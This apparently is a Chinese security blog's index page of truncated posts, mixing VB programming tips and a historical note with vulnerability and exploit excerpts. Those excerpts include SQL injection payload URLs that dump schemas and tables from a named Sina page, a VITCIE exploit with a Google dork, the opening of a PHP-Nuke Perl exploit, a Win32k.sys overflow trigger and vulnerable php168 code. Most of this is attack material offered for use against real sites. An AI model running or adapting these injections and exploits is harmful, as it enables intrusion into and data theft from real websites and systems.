【漏洞】php168二次注入漏洞

在文件member/ special.php中: elseif($job=="show_iframe"){ //第126行 $rsdb=$db->get_one("SELECT * FROM {$pre}special WHERE uid='$lfjuid' AND id='$id'"); …… if($act=="del"&&$aid) //第155行 { $detail=explode(",",$rsdb[aids]); foreach( $detail AS $key=>$value){ if($value==$aid){ unset($detail[$key]); } } $rsdb[aids]=$string=implode(",",$detail); $db->query("UPDATE {$pre}special SET aids='$string' WHERE uid='$lfjuid' AND id='$id'"); $r

【VB技巧】VB枚举注册表

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Private Declare Function RegEnumValue Lib "advapi32.dll" Alias "RegEnumValueA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, lpData As Byte, lpcbData As Long) As

【VB】SendKeys 语句详解

    SendKeys 语句 描述     将一个或多个按键消息发送到活动窗口,就如同用键盘进行输入一样。 语法     SendKeys string[, wait]     参数意义:     string部分必需的,字符串表达式,

【漏洞】Win32k.sys "CreateDIBPalette()" 溢出

Windows Win32k.sys 驱动 "CreateDIBPalette()" 缓冲区溢出 Windows win32k.sys Driver "CreateDIBPalette()" Buffer Overflow Sources: http://www.ragestorm.net/blogs/?p=255  http://secunia.com/advisories/40870/  DEVMODE dm = {0};  dm.dmSize  = sizeof(DEVMODE);  dm.dmBitsPerPel = 8;  dm.dmPelsWidth = 800;  dm.dmPelsHeight = 600;  dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;  ChangeDisplaySettings(&dm, 0);  BITMAPINFOHEADER bmih = {0};  bmih.biClrUsed = 0×200;  HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×10

【转载】VITCIE 1.1 SQL注入漏洞

# Exploit VITCIE 1.1 SQL Injection Vulnerability            # Date: 07/08/2010                            # Author: lucifer          # Software Link: http://www.vitci.com/ # Version: 1.1 # Google dork :inurl:"sendmail.php?action" # Platform / Tested on: windows # Category: Expliot code # Code : [SQL] #BUG:################################################################# After find plugin at sites run SQL Inject : example : http://site.com/sendmail.php?action=mailfriend&productid=[sql] ######################################################################

【漏洞】新浪网最新注入漏洞

注入页面: http://php.baby.sina.com.cn/diary/list.php 爆数据库: http://php.baby.sina.com.cn/diary/list.php?netid=5167%20and%201=2%20union%20select%201,2,3,group_concat(schema_name),5,6,7,8,9%20from%20information_schema.schemata-- 爆表: http://php.baby.sina.com.cn/diary/list.php?netid=51675115%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=0x70

今天是81建军节

    1927年8月1日凌晨,在以周恩来为首的前敌委员会领导下,贺龙、叶挺、朱德、刘伯承等率领在党直接掌握和影响下的军队2万余人,举行南昌起义。

【Oday】PHP-Nuke <= 8.1.0.3.5b 远程SQL注入

#!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Headers; my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my ($Victime) = shift or &usage; my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Search'); my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent(                         agent => 'Mozilla/5.0',                         max_redirect => 0,                         cookie_jar => $Cookies,                         default_headers => HTTP::Headers->new,                 ) or die $!; my $Response; my $Referrer = "query=Dante90, WaRWolFz

【转载】ASP与ASPX中结果集对于注入的影响

文/ninty 从BS大牛那里吸取的经验,然后自己小小研究了一下,写点笔记。。 先来看下面这段代码: <%     Set Conn = Server.CreateObject("ADODB.Connection")     conn.open "Driver={SQL Server};Server=MICROSOF-17A8A8;UID=sa;PWD=sajjjjjj;Database=pubs"     Set RS = Server.CreateObject("Adodb.Recordset")     RS.Open "select * from sysobjects where